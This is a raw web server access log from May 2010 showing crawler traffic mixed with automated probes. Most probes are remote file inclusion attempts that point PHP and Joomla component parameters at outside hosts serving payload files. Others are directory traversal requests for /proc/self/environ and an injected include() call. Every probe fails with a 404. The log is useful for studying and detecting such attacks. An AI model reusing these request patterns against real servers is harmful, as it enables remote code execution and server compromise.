218.149.84.14 - - [11/May/2010:00:14:40 -0500] "GET /logs/access_log.1265587200/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
218.149.84.14 - - [11/May/2010:00:14:40 -0500] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
218.149.84.14 - - [11/May/2010:00:15:12 -0500] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
218.149.84.14 - - [11/May/2010:00:15:12 -0500] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
218.149.84.14 - - [11/May/2010:00:15:12 -0500] "GET /logs/access_log.1265587200/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
216.129.119.11 - - [11/May/2010:00:15:12 -0500] "GET /logs/access_log.1215993600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
207.46.195.223 - - [11/May/2010:00:15:40 -0500] "GET /logs/access_log.1240617600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.50.85.15 - - [11/May/2010:00:15:44 -0500] "GET /logs/access_log.1268956800//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
74.50.85.15 - - [11/May/2010:00:15:44 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
74.50.85.15 - - [11/May/2010:00:15:44 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
87.250.255.243 - - [11/May/2010:00:17:27 -0500] "GET /logs/access_log.1237680000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.131 - - [11/May/2010:00:21:10 -0500] "GET /logs/access_log.1209513600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
75.149.214.226 - - [11/May/2010:00:23:07 -0500] "GET /logs/access_log.1228089600//errors.php?error=http://alexsa.justfree.com/id-vnc.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
75.149.214.226 - - [11/May/2010:00:23:07 -0500] "GET //errors.php?error=http://alexsa.justfree.com/id-vnc.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
75.149.214.226 - - [11/May/2010:00:23:07 -0500] "GET /logs//errors.php?error=http://alexsa.justfree.com/id-vnc.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
75.149.214.226 - - [11/May/2010:00:24:15 -0500] "GET /logs/access_log.1231718400//errors.php?error=http://alexsa.justfree.com/id-vnc.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
207.46.195.224 - - [11/May/2010:00:26:40 -0500] "GET /logs/access_log.1171152000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [11/May/2010:00:27:25 -0500] "GET /logs/access_log.1217376000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
90.156.145.171 - - [11/May/2010:00:32:54 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
207.46.13.140 - - [11/May/2010:00:33:40 -0500] "GET /logs/access_log.1181174400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.127.70.140 - - [11/May/2010:00:36:48 -0500] "GET /logs/access_log.1270598400%20%20/index0.php?show=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
216.127.70.140 - - [11/May/2010:00:37:12 -0500] "GET /logs/index0.php?show=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt???? HTTP/1.1" 404 299 "-""Mozilla/5.0"
216.127.70.140 - - [11/May/2010:00:37:12 -0500] "GET /index0.php?show=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt???? HTTP/1.1" 404 294 "-""Mozilla/5.0"
87.250.255.243 - - [11/May/2010:00:37:19 -0500] "GET /logs/access_log.1244160000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
125.247.249.195 - - [11/May/2010:00:39:43 -0500] "GET /logs/access_log.1262390400/allinurl:mod.php?mod=siteinfo&id=http://www.krdi.com/gnuboard4/data/x1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
125.247.249.195 - - [11/May/2010:00:39:43 -0500] "GET /logs/allinurl:mod.php?mod=siteinfo&id=http://www.krdi.com/gnuboard4/data/x1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
125.247.249.195 - - [11/May/2010:00:39:43 -0500] "GET /allinurl:mod.php?mod=siteinfo&id=http://www.krdi.com/gnuboard4/data/x1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
125.247.249.195 - - [11/May/2010:00:39:43 -0500] "GET /logs/access_log.1266451200/allinurl:mod.php?mod=siteinfo&id=http://www.krdi.com/gnuboard4/data/x1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
125.247.249.195 - - [11/May/2010:00:39:57 -0500] "GET /allinurl:mod.php?mod=siteinfo&id=http://www.krdi.com/gnuboard4/data/x1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
125.247.249.195 - - [11/May/2010:00:39:57 -0500] "GET /logs/access_log.1266451200/allinurl:mod.php?mod=siteinfo&id=http://www.krdi.com/gnuboard4/data/x1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
125.247.249.195 - - [11/May/2010:00:39:57 -0500] "GET /logs/access_log.1262390400/allinurl:mod.php?mod=siteinfo&id=http://www.krdi.com/gnuboard4/data/x1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
125.247.249.195 - - [11/May/2010:00:39:57 -0500] "GET /logs/allinurl:mod.php?mod=siteinfo&id=http://www.krdi.com/gnuboard4/data/x1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
207.46.13.53 - - [11/May/2010:00:41:40 -0500] "GET /logs/access_log.1244505600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [11/May/2010:00:50:32 -0500] "GET /logs/access_log.1228262400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [11/May/2010:00:50:34 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
222.122.52.80 - - [11/May/2010:00:54:03 -0500] "GET /logs//playing.php/common/db.php?commonpath=http://anfar4.fileave.com/id1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
222.122.52.80 - - [11/May/2010:00:54:03 -0500] "GET //playing.php/common/db.php?commonpath=http://anfar4.fileave.com/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
222.122.52.80 - - [11/May/2010:00:54:03 -0500] "GET /logs/access_log.1219795200%20%20//playing.php/common/db.php?commonpath=http://anfar4.fileave.com/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
222.122.52.80 - - [11/May/2010:00:54:58 -0500] "GET //playing.php/common/db.php?commonpath=http://anfar4.fileave.com/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
222.122.52.80 - - [11/May/2010:00:54:58 -0500] "GET /logs/access_log.1219795200%20%20//playing.php/common/db.php?commonpath=http://anfar4.fileave.com/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
222.122.52.80 - - [11/May/2010:00:54:58 -0500] "GET /logs//playing.php/common/db.php?commonpath=http://anfar4.fileave.com/id1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
207.46.199.54 - - [11/May/2010:00:55:40 -0500] "GET /logs/access_log.1229126400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
77.79.245.1 - - [11/May/2010:00:57:32 -0500] "GET /logs/access_log.1264982400//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.snij.info/orn2/data/id1.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
77.79.245.1 - - [11/May/2010:00:57:32 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.snij.info/orn2/data/id1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
77.79.245.1 - - [11/May/2010:00:57:32 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.snij.info/orn2/data/id1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
77.79.245.1 - - [11/May/2010:00:57:33 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.snij.info/orn2/data/id1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
77.79.245.1 - - [11/May/2010:00:57:33 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.snij.info/orn2/data/id1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
77.79.245.1 - - [11/May/2010:00:57:33 -0500] "GET /logs/access_log.1264982400//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.snij.info/orn2/data/id1.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
67.195.112.180 - - [11/May/2010:00:57:44 -0500] "GET /logs/access_log.1214784000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.199.51 - - [11/May/2010:01:00:40 -0500] "GET /logs/access_log.1157328000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
81.21.79.214 - - [11/May/2010:01:01:22 -0500] "GET /mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=' HTTP/1.1" 404 302 "-""libwww-perl/5.803"
67.195.112.180 - - [11/May/2010:01:01:23 -0500] "GET /logs/access_log.1163030400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.204.180 - - [11/May/2010:01:02:40 -0500] "GET /artwork/dioramas.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [11/May/2010:01:05:24 -0500] "GET /logs/access_log.1217635200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [11/May/2010:01:07:59 -0500] "GET /logs/access_log.1169856000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
216.127.70.140 - - [11/May/2010:01:08:00 -0500] "GET /logs/access_log.1266278400/index0.php?show=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.127.70.140 - - [11/May/2010:01:08:09 -0500] "GET /logs/access_log.1263254400/index0.php?show=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
207.46.195.229 - - [11/May/2010:01:10:10 -0500] "GET /logs/access_log.1169683200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
81.21.79.214 - - [11/May/2010:01:11:27 -0500] "GET /logs/access_log.1270512000/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=' HTTP/1.1" 404 329 "-""libwww-perl/5.803"
81.21.79.214 - - [11/May/2010:01:11:27 -0500] "GET /mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=' HTTP/1.1" 404 302 "-""libwww-perl/5.803"
81.21.79.214 - - [11/May/2010:01:11:27 -0500] "GET /logs/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=' HTTP/1.1" 404 307 "-""libwww-perl/5.803"
77.79.245.1 - - [11/May/2010:01:11:53 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.snij.info/orn2/data/id1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
77.79.245.1 - - [11/May/2010:01:11:53 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.snij.info/orn2/data/id1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
77.79.245.1 - - [11/May/2010:01:11:53 -0500] "GET /logs/access_log.1270598400%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.snij.info/orn2/data/id1.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
77.79.245.1 - - [11/May/2010:01:12:29 -0500] "GET /logs/access_log.1270598400%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.snij.info/orn2/data/id1.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
77.79.245.1 - - [11/May/2010:01:12:29 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.snij.info/orn2/data/id1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
77.79.245.1 - - [11/May/2010:01:12:29 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.snij.info/orn2/data/id1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
216.127.70.140 - - [11/May/2010:01:13:19 -0500] "GET /logs//index.php?option=com_ongumatimesheet20&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
216.127.70.140 - - [11/May/2010:01:13:30 -0500] "GET //index.php?option=com_ongumatimesheet20&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
216.127.70.140 - - [11/May/2010:01:13:51 -0500] "GET /logs//index.php?option=com_ongumatimesheet20&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
216.127.70.140 - - [11/May/2010:01:13:51 -0500] "GET //index.php?option=com_ongumatimesheet20&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
207.46.13.131 - - [11/May/2010:01:16:40 -0500] "GET /logs/access_log.1177113600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
208.115.111.248 - - [11/May/2010:01:18:54 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
216.129.119.10 - - [11/May/2010:01:23:02 -0500] "GET /logs/access_log.1230336000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
87.250.255.243 - - [11/May/2010:01:23:31 -0500] "GET /logs/access_log.1221177600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [11/May/2010:01:25:56 -0500] "GET /logs/access_log.1242604800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
216.150.224.151 - - [11/May/2010:01:28:55 -0500] "GET //linkadmin.php?page=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
216.150.224.151 - - [11/May/2010:01:28:55 -0500] "GET /logs//linkadmin.php?page=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
216.150.224.151 - - [11/May/2010:01:28:55 -0500] "GET /logs/access_log.1273190400//linkadmin.php?page=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
216.150.224.151 - - [11/May/2010:01:28:57 -0500] "GET /logs//linkadmin.php?page=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
216.150.224.151 - - [11/May/2010:01:28:57 -0500] "GET /logs/access_log.1273190400%20%20//linkadmin.php?page=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
216.150.224.151 - - [11/May/2010:01:28:57 -0500] "GET //linkadmin.php?page=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
216.150.224.151 - - [11/May/2010:01:29:40 -0500] "GET //linkadmin.php?page=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
216.150.224.151 - - [11/May/2010:01:29:40 -0500] "GET /logs//linkadmin.php?page=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
216.150.224.151 - - [11/May/2010:01:29:40 -0500] "GET /logs/access_log.1265760000//linkadmin.php?page=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
207.46.195.237 - - [11/May/2010:01:34:40 -0500] "GET /logs/access_log.1171929600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [11/May/2010:01:34:57 -0500] "GET /logs/access_log.1217030400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.55 - - [11/May/2010:01:36:09 -0500] "GET /logs/access_log.1243036800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
203.41.44.29 - - [11/May/2010:01:40:06 -0500] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
203.41.44.29 - - [11/May/2010:01:40:06 -0500] "GET /logs/access_log.1270598400//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
203.41.44.29 - - [11/May/2010:01:40:06 -0500] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
87.250.255.243 - - [11/May/2010:01:41:37 -0500] "GET /logs/access_log.1229212800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.194 - - [11/May/2010:01:42:40 -0500] "GET /logs/access_log.1264809600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.47 - - [11/May/2010:01:43:40 -0500] "GET /logs/access_log.1262390400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.52 - - [11/May/2010:01:47:40 -0500] "GET /logs/access_log.1233446400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [11/May/2010:01:48:11 -0500] "GET /logs/access_log.1178928000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
174.136.55.175 - - [11/May/2010:01:51:04 -0500] "GET /logs/access_log.1273276800/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.823"
174.136.55.175 - - [11/May/2010:01:51:04 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.823"
174.136.55.175 - - [11/May/2010:01:51:05 -0500] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.823"
67.195.112.180 - - [11/May/2010:01:52:54 -0500] "GET /logs/access_log.1220140800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
174.136.55.175 - - [11/May/2010:01:53:47 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.823"
174.136.55.175 - - [11/May/2010:01:53:48 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.823"
80.88.16.30 - - [11/May/2010:01:54:03 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.826"
80.88.16.30 - - [11/May/2010:01:54:03 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.826"
77.221.130.20 - - [11/May/2010:01:54:26 -0500] "GET /logs//poll/poll_ssi.php?include_path=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
77.221.130.20 - - [11/May/2010:01:54:26 -0500] "GET //poll/poll_ssi.php?include_path=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
77.221.130.20 - - [11/May/2010:01:54:26 -0500] "GET /logs/access_log.1268956800%20%20//poll/poll_ssi.php?include_path=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
77.221.130.20 - - [11/May/2010:01:54:30 -0500] "GET //poll/poll_ssi.php?include_path=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
77.221.130.20 - - [11/May/2010:01:54:30 -0500] "GET /logs//poll/poll_ssi.php?include_path=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
77.221.130.20 - - [11/May/2010:01:54:30 -0500] "GET /logs/access_log.1268956800//poll/poll_ssi.php?include_path=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
89.163.148.130 - - [11/May/2010:01:54:31 -0500] "GET /logs/access_log.1268956800%20%20//poll/poll_ssi.php?include_path=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
89.163.148.130 - - [11/May/2010:01:54:31 -0500] "GET /logs//poll/poll_ssi.php?include_path=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
89.163.148.130 - - [11/May/2010:01:54:31 -0500] "GET //poll/poll_ssi.php?include_path=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
89.163.148.130 - - [11/May/2010:01:54:31 -0500] "GET //poll/poll_ssi.php?include_path=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
89.163.148.130 - - [11/May/2010:01:54:31 -0500] "GET /logs/access_log.1268956800%20%20//poll/poll_ssi.php?include_path=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
89.163.148.130 - - [11/May/2010:01:54:32 -0500] "GET /logs//poll/poll_ssi.php?include_path=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
89.163.148.130 - - [11/May/2010:01:54:46 -0500] "GET /logs//poll/poll_ssi.php?include_path=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
89.163.148.130 - - [11/May/2010:01:54:46 -0500] "GET //poll/poll_ssi.php?include_path=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
89.163.148.130 - - [11/May/2010:01:54:46 -0500] "GET /logs/access_log.1268956800//poll/poll_ssi.php?include_path=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
89.163.148.130 - - [11/May/2010:01:54:46 -0500] "GET //poll/poll_ssi.php?include_path=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
89.163.148.130 - - [11/May/2010:01:54:46 -0500] "GET /logs/access_log.1268956800//poll/poll_ssi.php?include_path=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
89.163.148.130 - - [11/May/2010:01:54:46 -0500] "GET /logs//poll/poll_ssi.php?include_path=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
87.250.255.243 - - [11/May/2010:01:54:53 -0500] "GET /logs/access_log.1202774400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
78.110.50.139 - - [11/May/2010:01:55:01 -0500] "GET //poll/poll_ssi.php?include_path=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
78.110.50.139 - - [11/May/2010:01:55:01 -0500] "GET /logs//poll/poll_ssi.php?include_path=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
78.110.50.139 - - [11/May/2010:01:55:01 -0500] "GET /logs/access_log.1268956800//poll/poll_ssi.php?include_path=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
78.110.50.139 - - [11/May/2010:01:55:01 -0500] "GET //poll/poll_ssi.php?include_path=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
78.110.50.139 - - [11/May/2010:01:55:01 -0500] "GET /logs/access_log.1268956800%20%20//poll/poll_ssi.php?include_path=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
78.110.50.139 - - [11/May/2010:01:55:01 -0500] "GET /logs//poll/poll_ssi.php?include_path=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
212.94.64.154 - - [11/May/2010:01:55:09 -0500] "GET //poll/poll_ssi.php?include_path=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
212.94.64.154 - - [11/May/2010:01:55:09 -0500] "GET /logs/access_log.1268956800//poll/poll_ssi.php?include_path=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
212.94.64.154 - - [11/May/2010:01:55:09 -0500] "GET /logs//poll/poll_ssi.php?include_path=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
206.212.244.82 - - [11/May/2010:01:55:10 -0500] "GET //poll/poll_ssi.php?include_path=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
206.212.244.82 - - [11/May/2010:01:55:10 -0500] "GET /logs//poll/poll_ssi.php?include_path=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
206.212.244.82 - - [11/May/2010:01:55:10 -0500] "GET /logs/access_log.1268956800%20%20//poll/poll_ssi.php?include_path=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
206.212.244.82 - - [11/May/2010:01:55:19 -0500] "GET //poll/poll_ssi.php?include_path=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
206.212.244.82 - - [11/May/2010:01:55:19 -0500] "GET /logs//poll/poll_ssi.php?include_path=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
206.212.244.82 - - [11/May/2010:01:55:19 -0500] "GET /logs/access_log.1268956800//poll/poll_ssi.php?include_path=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
